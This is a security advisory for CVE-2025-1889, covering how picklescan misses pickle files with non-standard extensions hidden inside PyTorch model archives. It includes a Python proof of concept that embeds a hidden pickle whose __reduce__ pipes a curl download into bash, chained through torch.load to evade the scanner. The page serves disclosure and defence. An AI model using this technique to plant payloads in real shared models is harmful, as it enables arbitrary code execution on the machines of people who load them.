
exploitDog


GHSA-769v-p64c-89pr

Published: Mar 3, 2025
Source: github
GitHub: Reviewed
CVSS4: 5.3

Description

PyTorch Model Files Can Bypass Pickle Scanners via Unexpected Pickle Extensions

CVE-2025-1889

Summary

Picklescan fails to detect hidden pickle files embedded in PyTorch model archives due to its reliance on file extensions for detection. This allows an attacker to embed a secondary, malicious pickle file with a non-standard extension inside a model archive, which remains undetected by picklescan but is still loaded by PyTorch's torch.load() function. This can lead to arbitrary code execution when the model is loaded.

Details

Picklescan primarily identifies pickle files by their extensions (e.g., .pkl, .pt). However, PyTorch allows specifying an alternative pickle file inside a model archive using the pickle_file parameter when calling torch.load(). This makes it possible to embed a malicious pickle file (e.g., config.p) inside the model while keeping the primary data.pkl file benign.
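For illustration, the call below (a minimal sketch mirroring the PoC further down; the variable name obj is ours) deserializes config.p from the archive instead of the default data.pkl:

import torch

# Deserialize model/config.p from the archive instead of the default
# model/data.pkl; weights_only=False allows arbitrary pickled objects.
obj = torch.load("model.pt", pickle_file="config.p", weights_only=False)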

A typical attack works as follows:

  • A PyTorch model (model.pt) is created and saved normally.
  • A second pickle file (config.p) containing a malicious payload is crafted.
  • The data.pkl file in the model is modified to contain an object that calls torch.load('model.pt', pickle_file='config.p'), causing config.p to be loaded when the model is opened.
  • Since picklescan ignores non-standard extensions, it does not scan config.p, allowing the malicious payload to evade detection.
  • The issue is exacerbated by the fact that PyTorch models are widely shared in ML repositories and organizations, making it a potential supply-chain attack vector.

PoC

import os
import pickle
import zipfile
from functools import partial

import torch

class RemoteCodeExecution:
    def __reduce__(self):
        return os.system, ("curl -s http://localhost:8080 | bash",)

# Create a directory inside the model
os.makedirs("model", exist_ok=True)

# Create a hidden malicious pickle file
with open("model/config.p", "wb") as f:
    pickle.dump(RemoteCodeExecution(), f)

class AutoLoad:
    def __init__(self, path, **kwargs):
        self.path = path
        self.kwargs = kwargs

    def __reduce__(self):
        # Use functools.partial to create a partially applied function
        # with torch.load and the pickle_file argument; unpickling this
        # object re-invokes torch.load on the same archive.
        return partial(torch.load, self.path, **self.kwargs), ()

# Create a benign-looking model whose data.pkl re-loads config.p
model = {}
model['config'] = AutoLoad("model.pt", pickle_file='config.p', weights_only=False)
torch.save(model, "model.pt")

# Inject the second pickle into the model archive
with zipfile.ZipFile("model.pt", "a") as archive:
    archive.write("model/config.p", "model/config.p")

# Loading the model triggers execution of config.p
torch.load("model.pt")
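When model.pt is loaded, torch.load first deserializes the benign-looking data.pkl; unpickling its AutoLoad entry rebuilds the functools.partial object and re-invokes torch.load with pickle_file='config.p', at which point the RemoteCodeExecution payload runs the shell command via os.system.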

Impact

Severity: High

Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.

What is the impact? Attackers can embed malicious code in PyTorch models that remains undetected but executes when the model is loaded.

Potential Exploits: This vulnerability could be exploited in supply-chain attacks, for example to backdoor pre-trained models distributed via repositories like Hugging Face or PyTorch Hub.

Recommendations

  1. Scan All Files in the ZIP Archive: picklescan should analyze all files in the archive instead of relying on file extensions.
  2. Detect Hidden Pickle References: Static analysis should detect torch.load(pickle_file=...) calls inside data.pkl.
  3. Magic Byte Detection: Instead of relying on extensions, picklescan should inspect file contents for the pickle magic bytes (the PROTO opcode \x80 followed by a protocol byte, e.g. \x80\x05 for protocol 5); a sketch of this check follows the list.
  4. Block Dangerous Globals: Treat pickle references to torch.load and functools.partial as unsafe; a second sketch below shows a denylist check.
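A minimal sketch of recommendations 1 and 3, assuming it suffices to flag protocol-2+ pickle streams, which begin with the PROTO opcode \x80 followed by the protocol number. The helper names looks_like_pickle and scan_archive are illustrative, not part of the picklescan API:

import zipfile

def looks_like_pickle(header: bytes) -> bool:
    # Protocol 2+ pickle streams begin with the PROTO opcode \x80
    # followed by a protocol number (2..5); \x80\x05 is protocol 5.
    return len(header) >= 2 and header[0] == 0x80 and 2 <= header[1] <= 5

def scan_archive(path: str) -> list:
    # Check every member of the ZIP archive, regardless of extension.
    suspicious = []
    with zipfile.ZipFile(path) as archive:
        for name in archive.namelist():
            with archive.open(name) as member:
                if looks_like_pickle(member.read(2)):
                    suspicious.append(name)
    return suspicious

# e.g. scan_archive("model.pt") -> ['model/data.pkl', 'model/config.p']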
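And a sketch of recommendations 2 and 4, walking the opcode stream with the standard library's pickletools.genops and flagging denylisted GLOBAL/STACK_GLOBAL references. The STACK_GLOBAL handling is a deliberate simplification (it tracks only the most recently pushed strings rather than modeling the full unpickler stack), and find_denied_globals is a hypothetical helper:

import pickletools

DENYLIST = {("torch", "load"), ("functools", "partial")}

def find_denied_globals(data: bytes) -> set:
    hits = set()
    strings = []  # string operands pushed before a STACK_GLOBAL
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE"):
            strings.append(arg)
        elif opcode.name == "GLOBAL":
            # pickletools reports GLOBAL's operand as "module qualname"
            module, _, name = arg.partition(" ")
            if (module, name) in DENYLIST:
                hits.add((module, name))
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            # STACK_GLOBAL pops the module and qualname from the stack
            if (strings[-2], strings[-1]) in DENYLIST:
                hits.add((strings[-2], strings[-1]))
    return hits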

Packages

Name: picklescan
Ecosystem: pip
Affected versions: <= 0.0.21
Fixed version: 0.0.22

EPSS

Percentile: 10%
0.00036
Low

5.3 Medium

CVSS4

Weaknesses

CWE-646

Related vulnerabilities

CVSS3: 9.8
nvd
11 months ago

picklescan before 0.0.22 only considers standard pickle file extensions in the scope for its vulnerability scan. An attacker could craft a malicious model that uses Pickle and include a malicious pickle file with a non-standard file extension. Because the malicious pickle file inclusion is not considered as part of the scope of picklescan, the file would pass security checks and appear to be safe, when it could instead prove to be problematic.

CVSS3: 4.3
fstec
11 months ago

A vulnerability in the reduce-method handling of Picklescan, a security scanner for analyzing Python Pickle files, allows an attacker to execute arbitrary code.
